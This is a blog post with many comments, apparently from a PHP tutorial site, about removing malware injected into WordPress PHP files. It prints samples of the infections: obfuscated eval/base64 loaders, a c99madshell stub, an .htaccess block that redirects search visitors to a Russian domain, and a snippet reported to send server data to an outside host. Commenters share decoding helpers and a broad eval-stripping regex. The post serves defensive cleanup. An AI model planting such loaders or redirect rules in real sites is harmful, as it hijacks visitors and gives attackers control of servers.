[Solve] WordPress Malware Script Attack Fix

Our server was hacked, and all PHP files were infected. The infected PHP file was injected with a malicious code / malware, see below, the code calls another PHP file and run it’s program. In order, to clean the files I need to removed the malware or malicious codes on each files. It is really frustrating if you have hundreds of infected files. so, what I did is, I created a script that will do that automatically.

List of Malicious Code / Malware Script that I have encountered so far:

A. c99madshell – this type of malware script has the ability to view your database and access your files, just like an admin. Below is the sample code:

<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>

B. Trojan

<?php
...
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJj..."));
...

C. Trojan

<?php
if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='DTh0aDxGZzVodDE1Zzx4T19SQ1NfbEFKUnIrSjpxeGpqM2c1aHQxNTx4T19SQ1NfbEFKUnIrSjpxeDRuajt0MXRSWjVpPHhndFoySW0+UjVNTUtNWng0Tmo7NU1NS01STTUyS01pdDFkPE5qO2c1aHQxNTx4T19SU2JsOjBKUio6X0NsRzB4NHhNNWFLaTVSWndNdDJpUmFtd254ajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDU19sQUp4NGlNLTVqO2c1aHQxNTx4T19SU1BTRDpSQ1NfbEFKUkpscjp4NFdOVldOVm5wajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDOl8qOl9sQXg0aU0tNWo7ZzVodDE1PHhPX1JTUFNEOlJDOl8qOl9sQVJKbHI6eDRXTlZXTlZucGo7aC0xd2l0SzF8T19Scm1kdHdDaU10MlpJbVpmNVo8JG1NTWozdGg8dFpSbU1NbT48JG1NTWpqMyRtTU05bU1NbT5SYW0yPCdPX1JybWR0d0NpTXQyWkltWmY1Wic0JG1NTWo7QjVJWjUzJG1NTTlaaU10MlpJbVpmNVo8JG1NTWo7Qk01aS1NMXwkbU1NO0JoLTF3aXRLMXxPX1JsMXRpPGozZzV...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}

D. Javascript Trojan

<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.length

E. htaccess – The code below redirects your visitors to the hackers site (massage-pool.ru)

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://massage-pool.ru/mysave/index.php
ErrorDocument 401 http://massage-pool.ru/mysave/index.php
ErrorDocument 403 http://massage-pool.ru/mysave/index.php
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php

F. Timthumb Vulnerability

This script basically use to crop and resize images, it used in most WP Premium themes, but hackers were able to find the vulnerability of this script and was able to do whatever they want, unfortunately, with the help of this script they can access your database to get important information, insert malicious codes in all of your php files, and even create another malicious php script, and can do a lot more.

Any timthumb.php or thumb.php file that is below 1.35 version is vulnerable I advice to update the file to 2.0 and up version.

Solution: Update your file here: http://timthumb.googlecode.com/svn/trunk/timthumb.php

G. class-wheel.php

As far as I decoded the file, the script sends important information of your server to thebestcache.com and then the script gets data from that server and then execute it. I think with this script the hacker can do whatever they want to do to your server just like on timthumb such as writes RewriteRule on your htaccess to redirect user to his/hackers site, insert malicious iframes, insert malicious javascript, and a lot more.

Solution: Delete this file immediately

Below is the snippet code of the script

<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...

H. god_mode_on

<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?>
<?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>

I. Trojan

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Most these attacks happens when you have old version of your programs – WordPress, Joomla, Timthumb, WP Plugins, easy ftp or sftp password, and infected computer can use your ftp as well. Make sure you have an updated version of your programs.

Download and Install
Downloand cleaner script below and put in on your root directory or any directory. This program will check all the PHP files and clean it if it’s infected with Malware code above.

Malware code keeps on coming back
If you remove malware code / malicious script successfully but if it still keeps on coming back. I suggest you to run malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and please send the scan result to info@php-beginners.com, we need to find file that causes the malware code / malicious script on coming back.

You can download two types of Cleaner script
Web browser and Shell Access version. You can use any of the two.

  • Download Cleaner 2.10 HTTP Version below and run it on your favorite browser.
    Example: http://www.yoursite.com/cleaner_2.10.php
    cleaner_2.10
    Title : cleaner_2.10
    Caption :
    File name : cleaner_2.10.zip
    Size : 2 kB
  • Download Cleaner CLI 2.10 Version below and run it using terminal or command line.
    Example: $ time php cleaner-cli_2.10.php 2>&1 >> cleaner_log
    The command above will run the cleaner-cli_2.10.php script and log the output to cleaner_log file.
    cleaner-cli_2.10
    Title : cleaner-cli_2.10
    Caption :
    File name : cleaner-cli_2.10.zip
    Size : 2 kB

Note:
Please don’t forget to create a backup of your wordpress files or /wp-content/ directory only. Use shell access to backup files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_directory.tar.gz] [directory]

[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content
or
[~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./

This malware / malicious cleaner script works on all php programs, you can run it even if it’s a non-wordpress sites, but please create a backup of your files before you run the cleaner script, just to make sure you can recover it easily.

If you experienced any malware / malicious program that I don’t know, please let me know so that I can add it on the program. Thanks.

This entry was posted in Uncategorized. Bookmark the permalink.

279 Responses to [Solve] WordPress Malware Script Attack Fix

  1. Really great creation for WordPress Malware Script Attack Fix.

  2. Ashish says:

    Wow amazing nice! it worked!

  3. graeme says:

    Hi, does anyone know specifically what flaw created this issue? Was it definitely Word Press, if so does anyone have a permanent fix? Also, does anyone know what this script specifically does aside from injecting the malicious code in other script. To me, it appears it also captures credentials and/or attempts other hacks. I haven’t looked at all the code, but I’m hoping someone as more information on this.

    The script works by recursively evaluating a piece of code that it is encoded & inflated. For assistance, I’ve created a helper function which, when given the string passed to wp_add_filter, will decode the string and display the final readable php that is ultimately evaluated:

    function resolve($str) {
    	while(true) {
    		$str = gzinflate(base64_decode($str));
    		if(substr($str, 0, 4) != "eval") break;	
    		print $str;
    		print "";
    		$pos = strpos($str, "'")+1;
    		$rpos = strrpos($str, "'");
    		$str = substr($str, $pos, $rpos - $pos);
    	}
    	print $str;
    }

    As the author stated, the above runs another php script hidden in a random folder, which is much larger and includes most of the malicious code that not only injects itself to other scripts but appears to collect credentials, access other urls, run brute force, etc. I’ve not analyzed this larger code, but if someone has additional information, it would be helpful to prevent in the future.

    Thanks!

    • admin says:

      Hello Graeme,

      You can try this script to decrypt the code:

      <?php
      header("Content-type:text/plain");
      $malwareCode = gzinflate(base64_decode("FZnFDuvWAkU/p608MJOqDs.........................."));
      
      function malDecrypt($m){
      	if(preg_match("/^eval\(gzinflate/", $m)){
      		eval(str_replace("eval", "\$m=", $m));
      		return malDecrypt($m);
      	}else
      		return $m;
      }
      
      echo malDecrypt($malwareCode);

      Run this with your $malwareCode, make sure you replace the malware code. With my situatio,n the malware scripts looks like this:

      if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
      	$GLOBALS['mfsn']='/home3/hmjohnco/public_html/whatscrapandwhatsnot/cgi-bin/255.php';
      	if(file_exists($GLOBALS['mfsn'])){
      		include_once($GLOBALS['mfsn']);
      		if(function_exists('gml')&&function_exists('dgobh')){
      			ob_start('dgobh');
      		}
      	}
      }

      I didn’t really get into the details of the code. What I did, is I deleted the file he is calling. If you have enough time you can try to decrypt file and share us what you’ve found. I think it’s interesting.

      I think the attack happened because we are using shared server. I don’t think it’s in wordpress, but I’m not really sure about that.

      This hackers are really good because sometimes I’m having a hard time entering the ftp because I forgot my password but they (hackers) can easily go in and inject all those files. Amazing.

      Anyway, thanks for sharing Graeme. Hope they’ll stop bugging us, because they really cost a lot of time.

      Thanks Graeme :)

  4. Marin says:

    Many thanks guys!!! My site got infected today and I was able to fix the mess using your cleaner.php file (for which you’ll immediately receive a post in my blog – that’s the least I can do…). I think they’ve got through a WordPress vulnerability. What the virus appears to be doing is add spam links to the body of your pages. It seems it’s not doing anything else than that, although I wasn’t able to decrypt it all, so this is as far as I got… It’s still a mystery to me how they got in though, so even with the virus currently removed, I’m afraid it may happen again… Any advice?

    • Paolo says:

      Thank you Marin for sharing.

      That’s the usual malware does, it inserts bunch of codes, spam links, iframes, on your home page and subpages. Yeah! it’s still mystery, only the masters know. Actually, I’d like to know that too (on how to hack), so that I can defend my server somehow. But anyways, thanks Marin for your feedback, I’m happy that my little script help you on your malware issue.

      If you guys have any problem on different malware attack, let me know. I’ll try to update my cleaner.php script so that it can clean other malware attacks, or if you have time you can modify it and improve. Thanks.

  5. Marin says:

    At this point, I have the virus decrypted (about 4000 lines of code) Anyone willing to help with this? (reading and understanding it)

    My advice so far is, disable the following functions from your php.ini:

    disable_functions = create_function,gzinflate,eval,base64_decode

    • Paolo says:

      That’s good… hmmmm… Can I view it? Just give me a link.

      I’m not really sure on disabling gzinflate, eval, and specially base64_decode is a good idea.

  6. Poncho from mexico says:

    seems a really 0day VIrus…

    there is no forums or mailiing list about this virus

    yes, what would be the countermeasures for this new virus/malware ?

    disabling those functions that Marin mentioned wouldnt be good because Word press uses those functions i believe….

    Regards,

  7. Marin says:

    You’re right Poncho. WordPress uses all of these functions… I’m wondering if someone on the WordPress support forum will have any further ideas on this. Although I decoded 3 of the virus files I found, I’m almost sure I’m missing something… Has someone had a chance to look at the code I decrypted? Any luck in understanding it fully? I’m pasting the links here quickly, so that you don’t have to read the whole article on my blog:

    Malicious Code injected in every PHP file: http://pastebin.com/Wv9eqi7J (where “/home/marinbez/public_html/mediashare/cgi-bin/1bf.php” is the path to an include file containing more malicious code)

    1bf.php’s code (the filename is randomly generated): http://pastebin.com/SGJ74C6Y

    wp-thumb-creator.php’s code: http://pastebin.com/9gP3vgyH (looks like that’s one of the main virus files, but not the only one. it’s the one responsible for the PHP injection)

    SSHell v.1.0′s code: http://pastebin.com/1qS8CyCF (that shell file is usually located in the same folder as the others. it’s the file that allows the hackers to log into your server and cause trouble. I’ve intentionally commented out the authentication, so that you can see how it works, without having to type password)

  8. Karolis says:

    couple days without sleeping…was reinstalling all wp blogs, was thinking what to do and here it is, simple script ,that cleans these virus :)
    I would like to ask how much of blogs it can scan ? because when I’m starting it, it stops after some time.

  9. Karolis says:

    I fixed that problem by adding
    ini_set(‘memory_limit’,’128M’);

    • Paolo says:

      Oh! Yeah! exactly you will specify the memory limit. :) Sorry about that, I forgot to add that to the code. Thanks for letting me know about it. If possible, use the “cleaner-cli.php” run it on command-line so you won’t have problem on setting up memory limit. :D

      Basically, the script scans all PHP files – including sub-directories PHP files, so, if you’re going to put the “cleaner-cli.php” on your root directory, it eventually clean everything – all PHP files until to Nth sub-directory.

      I also suggest to run Malware Scanner ( http://www.php-beginners.com/wordpress-hack-malware-scanner.html ) that I recently created. You can view other potential hacking codes, such as, eval, c99madshell, and long_text. Again, I suggest to run it on command line. I might create an ajax version someday for cleaner and scanner script. So, it won’t take much of memory. I’ll just keep you all posted.

      Anyway, if you found bugs and errors, please do let me know. Thanks.

  10. Karolis says:

    strange, but it not founding md5 code at subdomain blogs.

    • Paolo says:

      Can I see your file structure? It should be like this one:

      - \www
      |- \www\cleaner-cli.php
      |- \www\sub-domain-1.com\
      |- \www\sub-domain-2.com\
      |- ...
      |- \www\directoryX\directoryY\....

      Cleaner will try open all the sub-directories and check all PHP files.

  11. Marin says:

    The issue has been recently reported on the WordPress forums: http://wordpress.org/support/topic/warning-tinymce-exploit

  12. My site’s also been infected. I’m on a shared server and don’t have command-line access, so I uploaded cleaner.php to the root directory and ran it from a browser.

    cleaner.php’s output was a nested list of files and directories with this line above it
    Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /var/www/vhosts/else.dnserver.net.nz/httpdocs/cleaner.php on line 2
    and the heading Found Files at the bottom.

    Do I need to do anything further with this output or has cleaner.php fully resolved everything?

    After running cleaner.php I manually deleted the two obviously bogus files fingered by the anti-virus application as they weren’t listed in the above report.

    Thanks,

    ::Leigh

    • Paolo says:

      Hello Leigh,

      Sorry for the late reply. I hope you already fixed your site, in case if not I created cleaner version 2. You can download it above (post).

      Please let me know if there still a problem. I’ll be happy to help you.

      Thanks

      Regards,
      Paolo

  13. Frank Rapp says:

    Thank you for your great work! It helped me to fix that problem! :-)

  14. Ishtiyak says:

    Hello admin,
    my site attracted with new Malware… but you current script not work bcz there command line is new… which is not found in my php…

    every php file include in header this command line

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3Rya…"));

    can you tell me how to resolved it?

    Thanks advance

    • Ishtiyak says:

      i have just change your $find code with bellow line
      $find =”\s*eval\s*\([^\)]+\)\)\;”;
      then run this script…
      wow it’s work with me… but i am afraid bcz i’m not good in php… so @Paolo if you make sure in this code no wrong then it would be greats… waiting for your replay…

      Thanks for create great scripts…

      • Paolo says:

        Hi Ishtiyak,

        Nice, yes, the script is pretty clean and safe, there’s nothing wrong about it.
        I’m not really sure why you’d replaced the $find value with “…eval\s*…” that means
        you’ll remove all “eval(.*)” functions in your php files?

        If that’s safe with your program, then we don’t have problem. :)

    • Paolo says:

      Oh! Sorry I didn’t noticed this first comment.
      You can try this one:

      $find = “<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);”;

      Test this one first on single file then run it on all of your
      files if it’s working fine. See structure below, on how to test on
      one file:

      /www/…/test/cleaner_2.0.php
      /www/…/test/infected-php-file.php

      Let me know.

      • Ishtiyak says:

        Thanks so much for you reply…

        this code not work with me
        $find = “<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);”;
        error this
        Warning: preg_match() [function.preg-match]: Compilation failed: unmatched parentheses at offset 43 in /***/**/cleaner2.php on line 161

        if at first we target '<?php eval' is it replace all '<?php' where it has 'eval' right?
        why i asking about <?php replacing bcz it infected like this type…

        <div id=”post-”>
        it’s effected on every php starting code… also 2 tab 1 space then start eval()… so if php remove the whole site not working….

        I know it pretty danger for bcz i target all eval() function… but when i try to add base64_decode() for safety then it same error show…

        P.S: $find =”\s*eval\s*\([^\)]+\)\)\;”; this pretty danger code works with my all site… (joomla, wordress, magento+custom php) now they are fresh… bcz till now not error show on site…

        Thanks

  15. Saje says:

    Hi,

    I am having the same exact problem as the poster above me with this code being injected to thousands of my files:

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29..."));

    Would you mind possible updating your cleaner tool for fixing this malware code? Or tell me how I can update the one you posted above so that it works correctly?

    THANK YOU so much for your help. I’ve been dealing with this since October and am just getting this close!

  16. David says:

    First, I would like to thank Pablo, your cleaner.php script corrected most of the php files.

    But I still have quite a few php files that have this kind of code –


    <?php
    if(!function_exists('.......................'))...

    Is there any fix for that?
    Thank You.

  17. As this article indicates, Malware is a major problem. Stopbadware.org reports that there are over 800,000 sites that are suffering from malware today. The process described above can be a very good set of tools to remove malware from your site, but in my experience it can come in many different and continuously innovative ways.

    So if the process seems to get to difficult, or if you have gotten infected multiple times I can probably help.

    I have worked to help numerous clients recover their sites, as well as monitor their sites to prevent future attacks and downtime because of being marked as infested by google and other services.

    You can check out some of my WordPress Security and Malware Recovery Services.

  18. Mike says:

    Paolo,
    You saved my life with this script. Your script worked perfectly! Thank you so very much. I would love to buy you a meal if you have a way I could get you some money.
    Do you have any suggestions on how to stop this from happening again? All of the infected files have been removed and I’ve updated everything I can. Changed all passwords. Everything is working perfectly, Any other suggestions?
    Thanks again.

    • Paolo says:

      Hi Mike,

      You’re welcome, I’m happy that my script helped you with those malware issue.
      My suggestion after cleaning up, if possible change the username/password of your
      ftp, db, wp login access, and etc… Create a backup as well.

      Make sure your plugins, themes, and wordpress are on updated version, because this is
      where they start hacking.

      You can also read on this page:
      http://wordpress.org/tags/vulnerability

      It will tell you informations about wordpress vulnerability.

      Thanks again for the comment Mike. Hope you’ll have a great day! :)

      Paolo

  19. Hiddenaka says:

    Your cleaning scripts saved my life. Thank you so much!!!

  20. Wahyu says:

    Hi Paola, thanks for your help..it’s really helpful…
    but after cleaning done, my website unable to load and has a error message like this:

    “Parse error: syntax error, unexpected ‘}’ in /… “

    could you help me what’s the problem..?

    Thank you very much

    • Paolo says:

      Hello Wahyu,

      Sorry for the late reply. I was so sick, the Doctor advised me to take a break.
      Did you create a backup before you run the cleaner script?

      What is your site?

      Let me know. Thanks.

      Paolo :)

  21. breaky says:

    thanks for your script!!

  22. Duncan says:

    Brilliant – thanks so much. Nice to know there are some good guys out there!

  23. Thank you so much for this script! Nightmare situation turned into easy resolution!

  24. jokomama says:

    hi there,

    can the script remove this kind of malware, mainly infected on index.php but i have alot of index.php files in various folders,

    if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){...}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54...];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);
    • Paolo says:

      Hello Jokomana,

      Unfortunately, It doesn’t remove this kind of malware but I can create a pattern of it. Just send me email with 3 infected files to info@php-beginners.com.
      Thanks.

      Paolo

    • Paolo says:

      Hi Jokomama,

      I have checked your sites. You have a trojan script on your site.
      I have updated my cleaner to 2.4 version. You can download and test running it. Please do create a backup first before you run it.

      Let me know. Thanks.

      Paolo

      • jokomama says:

        Hi, i am going to test run it. Do you have any idea how does this trojan virus works? how does it infect my sites, i am using shared hosting.

  25. jokomama says:

    Thank you buddy, emailed you

  26. Cris says:

    Hi Paolo,

    I found this hack today, please can you help me?

    Thank you.

